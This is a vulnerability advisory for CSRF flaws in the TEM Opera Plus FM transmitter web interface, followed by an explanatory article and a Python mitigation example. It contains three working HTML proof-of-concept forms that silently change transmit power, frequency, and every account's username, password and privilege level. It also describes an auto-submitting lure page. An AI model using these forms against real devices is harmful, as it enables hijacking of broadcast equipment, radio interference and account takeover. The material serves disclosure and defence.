TEM Opera Plus FM Family Transmitter 35.45 - XSRF
<!--
TEM Opera Plus FM Family Transmitter 35.45 XSRF
Vendor: Telecomunicazioni Elettro Milano (TEM) S.r.l.
Product web page: https://www.tem-italy.it
Affected version: Software version: 35.45
Webserver version: 1.7
Summary: This new line of Opera plus FM Transmitters combines very
high efficiency, high reliability and low energy consumption in compact
solutions. They have innovative functions and features that can eliminate
the costs required by additional equipment: automatic exchange of audio
sources, built-in stereo encoder, integrated RDS encoder, parallel I/O
card, connectivity through GSM telemetry and/or TCP IP / SNMP / SMTP
Webserver.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: Webserver
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5800
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5800.php
18.08.2023
-->
CSRF Change Forward Power:
-------------------------
<html>
<body>
<form action="http://192.168.1.2:8000/user/postcmd.htm" method="POST" enctype="text/plain">
<input type="hidden" name="Pwr" value="00100" />
<input type="submit" value="Change" />
</form>
</body>
</html>
CSRF Change Frequency:
---------------------
<html>
<body>
<form action="http://192.168.1.2:8000/user/postcmd.htm" method="POST" enctype="text/plain">
<input type="hidden" name="Freq" value="95.5" />
<input type="submit" value="Change" />
</form>
</body>
</html>
CSRF Change User/Pass/Priv Change Admin/User/Pass:
-------------------------------------------------
<html>
<body>
<form action="http://192.168.1.2:8000/protect/accounts.htm" method="POST">
<input type="hidden" name="usr0" value="admin" />
<input type="hidden" name="psw0" value="admin" />
<input type="hidden" name="usr1" value="operator1" />
<input type="hidden" name="psw1" value="operator1" />
<input type="hidden" name="lev1" value="1" />
<input type="hidden" name="usr2" value="operator2" />
<input type="hidden" name="psw2" value="operator2" />
<input type="hidden" name="lev2" value="1" />
<input type="hidden" name="usr3" value="consulter1" />
<input type="hidden" name="psw3" value="consulter1" />
<input type="hidden" name="lev3" value="2" />
<input type="hidden" name="usr4" value="consulter2" />
<input type="hidden" name="psw4" value="consulter2" />
<input type="hidden" name="lev4" value="2" />
<input type="hidden" name="usr5" value="consulter3" />
<input type="hidden" name="psw5" value="consulter3" />
<input type="hidden" name="lev5" value="2" />
<input type="submit" value="Change" />
</form>
</body>
</html>

Understanding CSRF Vulnerabilities in TEM Opera Plus FM Family Transmitter 35.45 - XSRF
The TEM Opera Plus FM Family Transmitter 35.45, a widely used radio frequency (RF) broadcasting system, has been identified as vulnerable to Cross-Site Request Forgery (CSRF), also known as XSRF. This vulnerability allows attackers to exploit authenticated sessions and perform unauthorized actions on behalf of legitimate users—without requiring their consent or knowledge.
What is CSRF? A Primer for Security Professionals
CSRF is a type of web-based attack where an attacker tricks a victim into submitting a malicious request to a web application they are authenticated to. The core principle lies in the fact that the web application trusts the user’s session and does not verify the origin of the request.
For example, if a user is logged into a device’s admin interface (e.g., http://192.168.1.2:8000), an attacker can craft a malicious webpage that automatically submits a form to change critical settings—such as transmission power or frequency—without the user’s awareness.
Explanation: The forward-power form above targets the postcmd.htm endpoint, which processes commands for changing forward power. The enctype="text/plain" makes the browser send the body as raw text (Pwr=00100) rather than as application/x-www-form-urlencoded; a cross-origin POST with that content type is still a "simple" request, so no CORS preflight is triggered and the device receives it like any other form submission. The hidden input field sets the power level to 00100, a value likely representing 100 watts. If a logged-in user visits a malicious site containing this form, their browser submits the request with the user's session cookie, potentially increasing transmission power to dangerous levels.
Real-World Impact: Manipulating RF Parameters
Transmitters like the TEM Opera Plus FM Family are used in broadcast networks, public safety communications, and even industrial control systems. Unauthorized changes to frequency or power can result in:
- Signal interference with other licensed broadcasters.
- Overpowering the transmitter, risking hardware damage or fire hazards.
- Unauthorized access to sensitive broadcast channels.
Consider the frequency change example above (CSRF Change Frequency):
Explanation: This form sets the transmission frequency to 95.5 MHz. If an attacker forces this change via a forged request, the device could shift into a licensed band without authorization—violating regulatory compliance and potentially disrupting emergency communications.
Administrative Access Exploitation: User/Pass/Priv Change
Even more critical is the ability to change user credentials and privileges. The accounts form shown above (CSRF Change User/Pass/Priv) allows an attacker to reset the system's access control configuration:
Explanation: That form targets the accounts.htm endpoint, which manages user accounts and permissions. The attacker can set the admin user to admin with password admin, a default credential that is widely known. The remaining fields set the names, passwords and privilege levels of the other accounts (usr1 to usr5, psw1 to psw5 and lev1 to lev5, with the level values 1 and 2 in the proof of concept), effectively reconfiguring the system's security model in one request.
Why CSRF Is Particularly Dangerous in Embedded Systems
Embedded devices like the TEM Opera Plus FM Family Transmitter often lack robust security mechanisms. They typically:
- Do not implement CSRF tokens.
- Use default credentials.
- Have limited logging and audit capabilities.
- Are accessible via internal networks with weak access controls.
These factors make CSRF attacks highly effective. Unlike traditional web applications, embedded systems often lack user awareness or session expiration mechanisms—making them ideal targets for silent, persistent exploitation.
Exploitation Scenario: A Malicious Webpage
Imagine an attacker hosting a malicious webpage:
(Only the page's visible text and script survive here: the title "Safe Radio Update", the text "Click to update your transmitter settings.", and the script line document.forms[0].submit(); which submits the hidden form.)
Explanation: This page is designed to auto-submit the power change request without user interaction. If a legitimate user (e.g., a technician) visits this page—perhaps via a phishing email or malicious link—the transmitter’s power is increased silently. This can lead to overheating, signal distortion, or even system failure.
Best Practices for Mitigation
To defend against CSRF in embedded systems like the TEM Opera Plus FM Family Transmitter, implement the following security measures:
| Measure | Description |
|---|---|
| CSRF Tokens | Include a unique, random token in each form that must be validated server-side. Tokens should be tied to user sessions and invalidated after use. |
| Same-Origin Policy Enforcement | Validate that requests originate from the same domain using Origin or Referer headers. |
| Require Re-authentication for Critical Actions | For sensitive operations (e.g., changing frequency or admin credentials), require re-login or multi-factor authentication. |
| Input Validation & Sanitization | Validate input values (e.g., frequency must be within legal bands) and reject malformed or out-of-range data. |
| Log and Monitor Access | Implement logging for all configuration changes and alert administrators on suspicious activity. |
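The following is an added example (not code from the advisory or from the vendor's firmware) of how a small embedded web server could apply three of the measures in the table to POSTs such as those to /user/postcmd.htm and /protect/accounts.htm: an Origin/Referer check, a per-session CSRF token, and range checks on the Pwr and Freq values. The device origin, the token field name "csrf", and the numeric ranges are assumptions made for the demonstration.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

DEVICE_ORIGIN = "http://192.168.1.2:8000"  # assumed: the transmitter's own origin (host from the PoC)
FREQ_MHZ = (87.5, 108.0)                   # assumed legal FM band for this deployment
PWR_RANGE = (0, 100)                       # assumed forward-power range the device accepts

def new_csrf_token():
    """Per-session token that the UI embeds in every form as a hidden 'csrf' field (assumed name)."""
    return secrets.token_urlsafe(32)

def source_allowed(headers):
    """Origin/Referer check: accept only requests sent by the device's own pages."""
    origin = headers.get("Origin")
    if origin is None:
        ref = headers.get("Referer")
        if ref is None:
            return False  # no provenance at all: treat as cross-site
        p = urlsplit(ref)
        origin = f"{p.scheme}://{p.netloc}"
    return origin == DEVICE_ORIGIN

def check_request(headers, body, session_token):
    """Gate a POST to postcmd.htm / accounts.htm; returns (accepted, reason).
    headers: dict keyed by canonical header names; body: raw POST body as a string."""
    if not source_allowed(headers):
        return False, "cross-site origin"
    ctype = headers.get("Content-Type", "").split(";")[0].strip()
    if ctype != "application/x-www-form-urlencoded":
        return False, "unexpected content type"  # the enctype="text/plain" PoC body stops here
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    token = fields.get("csrf")
    if token is None or not hmac.compare_digest(token.encode(), session_token.encode()):
        return False, "missing or bad CSRF token"
    if "Freq" in fields:  # reject frequencies outside the configured band
        try:
            freq = float(fields["Freq"])
        except ValueError:
            return False, "malformed Freq"
        if not FREQ_MHZ[0] <= freq <= FREQ_MHZ[1]:
            return False, "Freq out of band"
    if "Pwr" in fields:  # the PoC sends "00100": digits only, then bounded
        if not fields["Pwr"].isdigit():
            return False, "malformed Pwr"
        if not PWR_RANGE[0] <= int(fields["Pwr"]) <= PWR_RANGE[1]:
            return False, "Pwr out of range"
    return True, "ok"
```

The origin check alone already stops the forged request, because a browser stamps a cross-site form POST with the attacker page's Origin; the token and content-type checks cover clients and proxies that strip or omit that header.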
Conclusion: Security by Design in Embedded Systems
The TEM Opera Plus FM Family Transmitter 35.45 exemplifies how even seemingly benign embedded systems can harbor critical security flaws. CSRF vulnerabilities are not theoretical—they are real, exploitable, and capable of causing physical damage or regulatory violations.
As cybersecurity professionals, we must advocate for security-by-design principles in all embedded systems. This includes mandatory CSRF protection, default credential elimination, and robust access control. The cost of neglecting these measures is not just data theft—it is system integrity, public safety, and regulatory compliance.